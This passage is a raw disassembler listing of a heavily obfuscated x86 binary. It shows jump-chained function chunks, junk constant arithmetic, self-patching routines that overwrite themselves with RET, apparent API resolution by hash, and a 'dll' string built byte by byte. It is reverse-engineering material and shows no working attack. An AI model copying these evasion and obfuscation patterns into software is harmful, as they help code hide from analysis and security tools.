sub_451429	proc near		; CODE XREF: hvvrg7ie:004532BDj
					; sub_44DD3E:loc_45B321p
		xchg	eax, [esp+0]
		pop	eax
		call	sub_456DE7
		push	edi

loc_451433:				; CODE XREF: hvvrg7ie:loc_45A6B2j
		push	0D5E0C726h
		push	offset loc_4583E7
		jmp	nullsub_139
sub_451429	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_451442	proc near		; CODE XREF: hvvrg7ie:0043CB98j
					; sub_446B99+67D5p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B87B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043D2AB SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00440484 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441F0A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004449E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044986B SIZE 0000001A BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		push	eax
		push	edx
		push	7BC98457h

loc_45144D:				; CODE XREF: sub_43AE41:loc_4483B3j
		pop	edx
		jmp	loc_440484
sub_451442	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_451453:				; CODE XREF: sub_43F227+11774j
		jz	loc_4498CE
		jmp	loc_450203
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_45145E:				; CODE XREF: hvvrg7ie:loc_4460AFj
					; sub_44E6A5+80A1j
		cmp	eax, 0F1975114h
		jmp	loc_446461
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A91A

loc_451469:				; CODE XREF: sub_44A91A-8028j
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_4451E2
		push	edi
		mov	edi, edx
		push	offset sub_45B863
		jmp	nullsub_518
; END OF FUNCTION CHUNK	FOR sub_44A91A

; =============== S U B	R O U T	I N E =======================================



sub_451482	proc near		; DATA XREF: hvvrg7ie:loc_4485F3o

; FUNCTION CHUNK AT 0043BEB4 SIZE 00000005 BYTES

		add	edx, 556D1ADCh
		add	edx, ebp
		add	edx, 0B697F921h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_457691
		jmp	loc_43BEB4
sub_451482	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_163. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4514A2	proc near		; DATA XREF: hvvrg7ie:004398E9o
		add	edi, 0E44941A3h
		mov	edi, [edi]
		cmp	eax, edi
		pop	edi
		jnz	loc_441488
		jmp	loc_44CA5A
sub_4514A2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4514B8:				; DATA XREF: sub_44036B+9EBBo
		jz	loc_45A25B
		xor	eax, eax
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_4514C0:				; CODE XREF: sub_43B9C9:loc_4559D6j
		mov	[ebp-5], al
		mov	al, [ebp-5]
		pop	ecx
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447162

loc_4514CA:				; CODE XREF: sub_447162+A0F1j
		call	sub_446EC2

loc_4514CF:				; CODE XREF: hvvrg7ie:00451EDEj
		jmp	nullsub_250
; END OF FUNCTION CHUNK	FOR sub_447162
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B914

loc_4514D4:				; CODE XREF: sub_43B914+7j
		jmp	loc_452F02
; END OF FUNCTION CHUNK	FOR sub_43B914
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_4514D9:				; CODE XREF: sub_43B6A5+ADC3j
		cmp	ebp, edi
		jmp	loc_44F7DA
; END OF FUNCTION CHUNK	FOR sub_43B6A5

; =============== S U B	R O U T	I N E =======================================



sub_4514E0	proc near		; DATA XREF: sub_44D017o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044D654 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00452BE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A47C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B622 SIZE 00000008 BYTES

		push	ebx
		push	0B4C557F0h
		xchg	edx, [esp+8+var_8]
		mov	ebx, edx
		pop	edx
		xor	ebx, 0C05B25Fh

loc_4514F2:				; CODE XREF: sub_43C354:loc_43B0D9j
		jmp	loc_452BE6
sub_4514E0	endp

; ---------------------------------------------------------------------------
		xchg	ebp, [esp]
		mov	edx, ebp
		pop	ebp
		mov	eax, [esp]
		push	offset sub_43C43C
		jmp	locret_43ADC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_45150A:				; CODE XREF: sub_441DDD:loc_446BD7j
		rol	esi, 0Fh
		and	esi, 55DDEE0Fh
		add	esi, 0BE84D1F3h
		xchg	esi, [esp+8+var_8]
		jmp	sub_44F7CF
; END OF FUNCTION CHUNK	FOR sub_441DDD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480B3

loc_451521:				; CODE XREF: sub_4480B3+EB02j
		mov	[edi], eax
		pop	edi
		push	offset sub_456C29
		jmp	loc_45337D
; END OF FUNCTION CHUNK	FOR sub_4480B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A230

loc_45152E:				; CODE XREF: sub_44A230+12j
		jnz	loc_44FDF9

loc_451534:				; CODE XREF: hvvrg7ie:00458957j
		jmp	loc_440255
; END OF FUNCTION CHUNK	FOR sub_44A230
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF96

loc_451539:				; CODE XREF: sub_43AF96+6DD7j
		jmp	nullsub_205
; END OF FUNCTION CHUNK	FOR sub_43AF96
; ---------------------------------------------------------------------------
		mov	[edx], edi
		jle	loc_44C70A
		pushf
		push	edi
		cdq
		jmp	loc_44FDF9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_177. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45154F:				; CODE XREF: hvvrg7ie:0045426Aj
		jmp	loc_452525
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_451554:				; CODE XREF: sub_44398A+Dj
		jmp	loc_44C1AA
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------

loc_451559:				; CODE XREF: hvvrg7ie:0044151Cj
		jmp	loc_457103
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B334

loc_45155E:				; CODE XREF: sub_45B334:loc_451C9Bj
		sbb	esi, ecx
		jmp	loc_43F6A0
; END OF FUNCTION CHUNK	FOR sub_45B334
; ---------------------------------------------------------------------------
		jl	loc_455986
; START	OF FUNCTION CHUNK FOR sub_4522F8

loc_45156B:				; CODE XREF: sub_4522F8-18058j
		jmp	loc_450DA3
; END OF FUNCTION CHUNK	FOR sub_4522F8
; ---------------------------------------------------------------------------
		and	ebp, 0DC183DDCh
		jmp	loc_455980
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_45157B:				; CODE XREF: sub_454789:loc_454792j
		sub	edi, 246665A4h
		mov	edi, eax
		jmp	loc_4408E2
; END OF FUNCTION CHUNK	FOR sub_454789
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_511. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446407

loc_451589:				; CODE XREF: sub_446407+1Cj
		jmp	loc_44AAB1
; END OF FUNCTION CHUNK	FOR sub_446407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440881

loc_45158E:				; CODE XREF: sub_440881+Ej
		jmp	loc_44E5B9
; END OF FUNCTION CHUNK	FOR sub_440881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F72

loc_451593:				; CODE XREF: sub_445F72-93F7j
		jmp	loc_4542F0
; END OF FUNCTION CHUNK	FOR sub_445F72
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_451598:				; CODE XREF: sub_4465A6-B38Cj
		add	eax, 25CEDB6h
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		push	offset loc_44584B
		jmp	nullsub_355
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_4515AE:				; CODE XREF: sub_448FB0:loc_444893j
		pop	edx
		add	edx, 0CD0375AEh
		and	edx, 1F6EA4FFh
		xor	edx, 0A241C056h
		jmp	loc_444E7F
; END OF FUNCTION CHUNK	FOR sub_448FB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_4515C6:				; CODE XREF: sub_451E6D:loc_451E72j
		jge	loc_44AC7E

loc_4515CC:				; CODE XREF: sub_450E01+AA1Dj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------

loc_4515D1:				; CODE XREF: hvvrg7ie:0044904Fj
		jmp	sub_44E560
; ---------------------------------------------------------------------------

loc_4515D6:				; CODE XREF: hvvrg7ie:0043C132j
		jmp	loc_44A75C
; ---------------------------------------------------------------------------
		xor	ebx, 6862DA4Bh
		sub	ecx, ebx
		and	ecx, 6E08F19h
		jmp	loc_44AC7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_4515EE:				; CODE XREF: sub_45B9BB-1E10Bj
		ror	ecx, 14h
		push	2FA96CCEh
		js	loc_45A772
		test	ebx, 0FCB6A595h
		jmp	loc_452D44
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------
		mov	eax, edi
		jmp	sub_454099
; ---------------------------------------------------------------------------

loc_45160E:				; CODE XREF: hvvrg7ie:0044EDD4j
		and	ebx, 255DB984h
		jmp	loc_4461F5
; ---------------------------------------------------------------------------

loc_451619:				; DATA XREF: sub_44C072-FC70o
		xchg	edx, [esp]
		mov	esi, edx
		push	offset sub_445BA0
		jmp	locret_452E33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45278C

loc_451628:				; CODE XREF: sub_45278C:loc_43A4BFj
		pop	ebx
		or	ebx, 0FA3ABE45h
		sub	ebx, ds:4000F6h
		add	ebx, 0A103DA4Fh
		test	ebx, 800000h
		jmp	loc_45289E
; END OF FUNCTION CHUNK	FOR sub_45278C
; ---------------------------------------------------------------------------
		jns	loc_43FEB6
		jmp	sub_44D798
; ---------------------------------------------------------------------------
		shr	ecx, 19h
		jmp	loc_43DD26
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_365. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_45165A:				; CODE XREF: sub_451669:loc_441378j
		pop	ecx
		lea	eax, sub_44713B
		mov	byte ptr [eax],	0C3h
		jmp	sub_44713B
; END OF FUNCTION CHUNK	FOR sub_451669

; =============== S U B	R O U T	I N E =======================================



sub_451669	proc near		; CODE XREF: sub_41088C+45p
					; hvvrg7ie:004501D2j
					; DATA XREF: ...

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004397EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FCE7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00440664 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441372 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004420A5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044239B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447558 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044761D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004479CB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004480EA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00448C96 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044943C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E6D8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044E952 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E997 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004501E7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004502DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045086C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045165A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452530 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452C0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452DAB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454079 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455387 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004574C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045773B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458310 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00459ACD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AA65 SIZE 00000010 BYTES

		push	edx
		jmp	loc_454079
sub_451669	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC16

loc_45166F:				; CODE XREF: sub_44EC16-96BCj
		mov	ebp, edx
		xchg	ebp, [esp+8+var_8]
		call	sub_455751
		mov	eax, 0CE6B079Ah
		call	sub_450C5A
		mov	ds:off_41D05C, eax
		lea	eax, sub_44EC16
		mov	byte ptr [eax],	0C3h
		jmp	loc_446C12
; END OF FUNCTION CHUNK	FOR sub_44EC16

; =============== S U B	R O U T	I N E =======================================



sub_451697	proc near		; CODE XREF: hvvrg7ie:0045A2F5j
					; DATA XREF: sub_4525FC+B40o

; FUNCTION CHUNK AT 0043F73B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00446611 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CBD3 SIZE 0000000F BYTES

		mov	eax, [eax]
		mov	al, [eax]
		jz	loc_44CBD3
		sub	al, 99h
		push	0D183E2CFh
		jmp	loc_446611
sub_451697	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4516AD:				; CODE XREF: hvvrg7ie:0044067Cj
		retn
; ---------------------------------------------------------------------------

loc_4516AE:				; CODE XREF: hvvrg7ie:loc_44A17Ej
		and	eax, 0F6CF8D41h
		sub	eax, 0E09E80Bh
		xor	eax, 1C74DEE0h
		push	offset loc_44D260
		jmp	locret_448C1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_4516CA:				; CODE XREF: sub_445F2A-1411j
		jge	loc_446CCB
		jmp	loc_44AB78
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------

loc_4516D5:				; CODE XREF: hvvrg7ie:0044C684j
		and	ecx, 4C7BA2D3h
		not	ecx

loc_4516DD:				; CODE XREF: hvvrg7ie:loc_44C674j
		and	edi, 0D411EE59h
		cmp	edi, 0FB4486B5h
		jmp	loc_4495D6
; ---------------------------------------------------------------------------

locret_4516EE:				; CODE XREF: hvvrg7ie:loc_44D801j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_4516EF:				; CODE XREF: sub_443452+A4C2j
		jmp	loc_439200
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439717

loc_4516F4:				; CODE XREF: sub_439717+8j
		rol	eax, 6
		push	eax
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_439717
; ---------------------------------------------------------------------------

loc_4516FE:				; CODE XREF: hvvrg7ie:00447CC9j
		jmp	loc_444227

; =============== S U B	R O U T	I N E =======================================



sub_451703	proc near		; CODE XREF: sub_4589D3-1D0EDj
					; sub_44D47A:loc_44085Bp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00445E26 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 004587E7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00458D65 SIZE 00000005 BYTES

		push	eax
		mov	eax, ebp
		jmp	loc_445E26
sub_451703	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_45170B:				; CODE XREF: sub_43B7B9:loc_440725j
					; sub_43B7B9+1678Cj
		push	0D12C3440h
		pop	eax
		or	eax, 0B856D271h
		add	eax, 0EBAFD54Ch
		add	eax, ebp
		add	eax, 1AD1341Fh
		push	esi
		jmp	loc_43C1D8
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_550. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410E1

loc_45172C:				; CODE XREF: sub_4410E1+1754Cj
		jmp	loc_4588E8
; END OF FUNCTION CHUNK	FOR sub_4410E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_451731:				; CODE XREF: sub_456CD4-14459j
		push	0A66A81EAh
		pop	esi
		sub	esi, 0C441F584h
		or	esi, 0D429C372h
		js	loc_44252B
; END OF FUNCTION CHUNK	FOR sub_456CD4
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_451749:				; CODE XREF: sub_44D2F8+729Fj
		jz	loc_443205
		jmp	loc_43BD80
; END OF FUNCTION CHUNK	FOR sub_44D2F8

; =============== S U B	R O U T	I N E =======================================



sub_451754	proc near		; CODE XREF: hvvrg7ie:0043CEB1p
					; hvvrg7ie:004468F0j
		xchg	esi, [esp+0]
		pop	esi
		rol	edx, 14h
		call	sub_448BB2
sub_451754	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44955C

loc_451760:				; CODE XREF: sub_44955C+11ECBj
		jmp	loc_43EA0A
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443B00

loc_451765:				; CODE XREF: sub_443B00+10j
		jmp	loc_451043
; END OF FUNCTION CHUNK	FOR sub_443B00
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_272. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_45176B:				; CODE XREF: sub_45541B+20FBj
		jmp	loc_459466
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED23

loc_451770:				; CODE XREF: sub_44ED23-1C38j
		jmp	loc_43EEFD
; END OF FUNCTION CHUNK	FOR sub_44ED23
; ---------------------------------------------------------------------------

loc_451775:				; DATA XREF: sub_448DB2+FA2Bo
		push	eax
		push	0EDCE1C05h
		pop	eax
		and	eax, 8839A8BAh
		or	eax, 0F559EA16h
		jmp	loc_450420
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_45178D:				; CODE XREF: sub_445CCD:loc_4422FCj
		jnz	loc_44F29D
		jmp	loc_4533DB
; END OF FUNCTION CHUNK	FOR sub_445CCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_385. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_451799:				; CODE XREF: sub_43E60A:loc_459101j
		jmp	nullsub_358
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------

loc_45179E:				; CODE XREF: hvvrg7ie:0044A932j
		jmp	loc_45A9F0

; =============== S U B	R O U T	I N E =======================================



sub_4517A3	proc near		; CODE XREF: hvvrg7ie:0044F7BEj
					; hvvrg7ie:00459167p
		xchg	edx, [esp+0]
		pop	edx
sub_4517A3	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_4517A7:				; CODE XREF: sub_4554E8:loc_44374Aj
		call	sub_4546E9
		mov	eax, 19CFC62Bh
		call	sub_450C5A
		mov	ds:dword_41D060, eax
		lea	eax, nullsub_19
		jmp	loc_451CEE
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------

loc_4517C7:				; CODE XREF: hvvrg7ie:00452FA9j
		jno	loc_449479
		push	2D822D07h
		jmp	sub_444363
; ---------------------------------------------------------------------------

locret_4517D7:				; CODE XREF: hvvrg7ie:00442EDAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443048

loc_4517D8:				; CODE XREF: sub_443048+178B4j
		jmp	sub_443048
; END OF FUNCTION CHUNK	FOR sub_443048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_4517DD:				; CODE XREF: sub_44B1C6-43FFj
		jmp	loc_44F3D4
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_397. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_4517E3:				; CODE XREF: sub_450AA8:loc_4577ADj
		cmp	ebx, 2C923D15h
		jmp	loc_44A8E9
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
		cmp	ebp, 0D31902A2h
		jmp	loc_4400E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_4517F9:				; CODE XREF: sub_44DB53+B4E5j
		jz	loc_45B0FF
		jmp	loc_4512F4
; END OF FUNCTION CHUNK	FOR sub_44DB53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF23

loc_451804:				; CODE XREF: sub_43BF23+14j
		or	esi, 2A95F7FFh
		and	esi, 0E47A33FDh
		add	esi, 0E011FC6Fh
		push	offset sub_450DF9
		jmp	loc_4410A5
; END OF FUNCTION CHUNK	FOR sub_43BF23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E68D

loc_451820:				; CODE XREF: sub_44E68D-26CFj
		push	6FB7FB10h
		pop	esi
		sub	esi, 0DDB2DFCDh
		rol	esi, 15h
		add	esi, 97CF9015h
		mov	[esi], eax
		pop	esi
		lea	eax, loc_459767
		jmp	loc_44A945
; END OF FUNCTION CHUNK	FOR sub_44E68D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_451843:				; CODE XREF: sub_4589D3-1412Bj
		mov	edi, ebp
		cmp	edi, 430CB4A1h

loc_45184B:				; CODE XREF: hvvrg7ie:loc_445FEEj
		jmp	loc_43FB41
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_451850:				; CODE XREF: sub_45A234-10FAEj
		call	sub_45B888
; END OF FUNCTION CHUNK	FOR sub_45A234
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_451855:				; CODE XREF: sub_43E163:loc_448215j
		jp	loc_458B43

loc_45185B:				; CODE XREF: hvvrg7ie:loc_44820Cj
		and	ecx, 0B0093492h
		jns	loc_43CBB4
		and	eax, 8DA460F4h
		jo	loc_45695A
		mov	edx, 61DACE4Ch
		jmp	loc_43CBB1
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------
		sbb	eax, 84C8DC72h
		jmp	sub_45B334
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_528. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_451889:				; CODE XREF: sub_44E3B3+19j
		jmp	loc_44C640
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449885

loc_45188E:				; CODE XREF: sub_449885-2168j
		jmp	loc_44BD8E
; END OF FUNCTION CHUNK	FOR sub_449885
; ---------------------------------------------------------------------------

loc_451893:				; CODE XREF: hvvrg7ie:0043F2BAj
		jmp	sub_450C5A
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44048E

loc_451899:				; CODE XREF: sub_44048E:loc_451DD3j
		add	eax, 9C73804Dh
		call	sub_447BA6

loc_4518A4:				; CODE XREF: sub_444BE1+13C5Bj
		jmp	loc_43A364
; END OF FUNCTION CHUNK	FOR sub_44048E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_4518A9:				; CODE XREF: sub_450246-15B50j
		jmp	loc_44E7E4
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484B9

loc_4518AE:				; CODE XREF: sub_4484B9:loc_44932Aj
		push	eax
		call	sub_4584F2
		lea	eax, [ebp-0Ch]
		push	eax
		jmp	loc_4567E3
; END OF FUNCTION CHUNK	FOR sub_4484B9

; =============== S U B	R O U T	I N E =======================================



sub_4518BD	proc near		; CODE XREF: sub_44A4D4:loc_44A4DBj

; FUNCTION CHUNK AT 00440A1A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F59 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044844F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E0F4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455815 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004561E4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045B159 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B4DD SIZE 0000000F BYTES

		add	esp, 0FFFFFFE0h
		jmp	loc_455815
sub_4518BD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498FB

loc_4518C5:				; CODE XREF: sub_4498FB+8752j
		push	27D377A8h
		sbb	edx, ebx
		xor	eax, 7707FAE0h
		jmp	loc_4417F2
; END OF FUNCTION CHUNK	FOR sub_4498FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_4518D7:				; CODE XREF: sub_457F50+Bj
		nop
		mov	eax, 2867838Ah
		push	edi
		push	13882B1Eh
		pop	edi
		add	edi, 8AF741A3h
		jmp	loc_43BBEC
; END OF FUNCTION CHUNK	FOR sub_457F50

; =============== S U B	R O U T	I N E =======================================



sub_4518EF	proc near		; DATA XREF: sub_43C562+13A16o
		mov	byte ptr [eax],	0C3h
		jmp	sub_4475EC
sub_4518EF	endp


; =============== S U B	R O U T	I N E =======================================



sub_4518F7	proc near		; CODE XREF: sub_41A138+3Bp
					; sub_4518F7+5j
					; DATA XREF: ...
		call	sub_45190C
		jmp	ds:off_41D0D0
sub_4518F7	endp

; ---------------------------------------------------------------------------

loc_451902:				; CODE XREF: hvvrg7ie:004543D3j
		jmp	locret_4421F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_451907:				; CODE XREF: sub_454789-1679Aj
		jmp	loc_4512FF
; END OF FUNCTION CHUNK	FOR sub_454789

; =============== S U B	R O U T	I N E =======================================



sub_45190C	proc near		; CODE XREF: sub_440964:loc_439A85j
					; sub_443163:loc_43EC1Fj ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D8B5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444898 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444A84 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447B11 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458701 SIZE 00000005 BYTES

		pop	edx
		jnz	loc_444A84
		jmp	loc_458701
sub_45190C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_451918:				; CODE XREF: sub_450434:loc_44601Dj
		mov	byte ptr [eax],	64h
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	6Ch
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	6Ch
		inc	dword ptr [ebp-20h]
		jmp	loc_439BDF
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		mov	ds:off_41D0D0, eax
		push	offset sub_444A76
		jmp	loc_451FB3
; ---------------------------------------------------------------------------

loc_451945:				; CODE XREF: hvvrg7ie:loc_444958j
		jnz	loc_44A37C
		jmp	loc_446D59
; ---------------------------------------------------------------------------

loc_451950:				; CODE XREF: hvvrg7ie:0044C94Bj
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_17

; =============== S U B	R O U T	I N E =======================================



sub_451958	proc near		; CODE XREF: sub_405C7A+1Bp
					; sub_405C7A+45p ...
		call	sub_45196D

loc_45195D:				; CODE XREF: hvvrg7ie:loc_43E4F6j
		jmp	ds:off_41D16C
sub_451958	endp

; ---------------------------------------------------------------------------

loc_451963:				; CODE XREF: hvvrg7ie:004575F3j
		jmp	loc_441D60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_451968:				; CODE XREF: sub_453BBD+10j
		jmp	loc_45B53A
